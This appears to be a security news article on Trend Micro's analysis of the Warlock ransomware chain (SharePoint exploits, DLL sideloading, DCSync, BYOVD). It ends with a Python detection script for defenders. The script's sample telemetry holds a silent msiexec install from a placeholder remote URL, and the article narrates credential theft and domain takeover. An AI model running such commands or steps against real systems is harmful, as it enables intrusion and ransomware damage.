Warlock Attack Chain Dissected: SharePoint Exploits, BYOVD, and Ransomware Deployment
Trend Micro reveals a sophisticated Warlock attack chain exploiting SharePoint vulnerabilities, using BYOVD and legitimate tools like TightVNC and Velociraptor for persistence and lateral movement.

Trend Micro researchers have published a detailed analysis of a Warlock attack chain that demonstrates an expanded toolset and improved evasion capabilities. The campaign, which exploits Microsoft SharePoint vulnerabilities for initial access, employs a persistent Bring Your Own Vulnerable Driver (BYOVD) technique, legitimate remote access tools, and culminates in ransomware deployment. The findings highlight the group's ability to blend malicious activity with trusted software to evade detection.
Initial access is achieved through Microsoft SharePoint vulnerabilities, with the attackers timing their activity to coincide with holiday periods when staffing and monitoring are reduced. Trend Micro's telemetry traced the earliest malicious activity to the SharePoint worker process (w3wp.exe), which spawned a Cobalt Strike beacon agent via DLL sideloading. The legitimate binary MsMpSrv.exe (originally cookie_exporter.exe) sideloads a malicious MsEdge.dll, which establishes a connection to the command-and-control server at code[.]translatevv[.]com. A second tool, EndProcess.exe, was dropped to terminate security products.
Approximately two weeks later, a second wave of activity was observed on the same compromised server. The attackers used msiexec.exe to silently download and install a remote MSI payload hosted on Supabase cloud storage, a legitimate platform, to evade network-level detections. This payload was later verified as the legitimate DFIR tool Velociraptor, repurposed for C&C. A web shell named cproxy.aspx was then written to the IIS/SharePoint environment, confirming post-exploitation persistence.
For credential access, the attackers executed commands invoking the Windows Credential Manager interface and conducted DCSync attacks using a tool named debug.exe to impersonate a Domain Controller and retrieve user credentials. Lateral movement was extensive, involving PsExec, TightVNC, PowerShell Remoting, and an RDP Patcher to enable concurrent sessions. The attackers gained control of the Domain Controller, reset the built-in Administrator password, and added a domain user to the Domain Administrators group, achieving full domain compromise.
The command-and-control infrastructure relied heavily on legitimate tools. Velociraptor (version 0.73.4) was abused as the primary C&C framework, while the BYOVD technique leveraged the NSec driver for persistence and defense evasion. The attack chain demonstrates a sophisticated blend of living-off-the-land binaries, legitimate software, and custom tools used to maintain stealth and achieve the group's objectives.
This analysis underscores the evolving tactics of the Warlock group, which continues to refine its methods to bypass security controls. The use of trusted platforms like Supabase and legitimate tools like Velociraptor and TightVNC makes detection challenging. Organizations are advised to monitor for unusual SharePoint activity, enforce strict application allowlisting, and implement robust detection rules for BYOVD techniques and lateral movement patterns.
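The monitoring advice above can be turned into concrete host telemetry rules. The following is an added example, not Trend Micro's detection content, that checks constructed process-create and image-load records for three behaviours from the chain described: w3wp.exe spawning a child process, msiexec.exe quietly installing a package from an HTTP(S) URL, and MsEdge.dll loaded from outside trusted directories. The event fields, the supabase.co hostname and the file paths are assumed or placeholder values, not indicators from the report.

```python
import re
from dataclasses import dataclass

# Roots where binaries are expected to live; C:\Windows\Temp is deliberately absent (user-writable).
TRUSTED_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                 "c:\\program files\\", "c:\\program files (x86)\\")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

@dataclass
class Event:  # minimal process-create / image-load record (constructed shape, not a real log format)
    parent_image: str
    image: str
    cmdline: str
    loaded_dll: str = ""  # set only for image-load events

def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def _trusted(path: str) -> bool:
    return path.lower().startswith(TRUSTED_ROOTS)
def detect(ev: Event) -> list:
    hits = []
    # 1. SharePoint worker (w3wp.exe) spawning a shell, or any child outside trusted roots
    if _name(ev.parent_image) == "w3wp.exe" and (_name(ev.image) in SHELLS or not _trusted(ev.image)):
        hits.append("w3wp_child_process")
    # 2. msiexec installing a package fetched over HTTP(S) with a quiet / no-UI switch
    if (_name(ev.image) == "msiexec.exe" and re.search(r"https?://", ev.cmdline, re.I)
            and re.search(r"(?i)(^|\s)/(qn|qb|q|quiet)\b", ev.cmdline)):
        hits.append("msiexec_remote_quiet_install")
    # 3. A DLL carrying a Microsoft component name (MsEdge.dll) loaded from outside trusted roots
    if ev.loaded_dll and _name(ev.loaded_dll) == "msedge.dll" and not _trusted(ev.loaded_dll):
        hits.append("suspicious_dll_sideload")
    return hits

def scan(events):
    """Return {event_index: [rule names]} for every event that triggered at least one rule."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}

# Constructed sample telemetry; the supabase.co host is a PLACEHOLDER, not a real indicator.
SAMPLE_EVENTS = [
    Event(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\Temp\MsMpSrv.exe", "MsMpSrv.exe"),
    Event(r"C:\Windows\Temp\MsMpSrv.exe", r"C:\Windows\Temp\MsMpSrv.exe", "MsMpSrv.exe",
          loaded_dll=r"C:\Windows\Temp\MsEdge.dll"),
    Event(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe",
          'msiexec.exe /i "https://PLACEHOLDER.supabase.co/storage/v1/object/public/p/a.msi" /qn'),
    Event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
          r"msiexec.exe /i C:\Users\jane\Downloads\tool.msi"),  # local package: benign
    Event(r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\conhost.exe", "conhost.exe"),
]
```

Rule 1 is intentionally broad because w3wp.exe almost never needs to create processes; tune the trusted roots to the server's actual install layout before deploying.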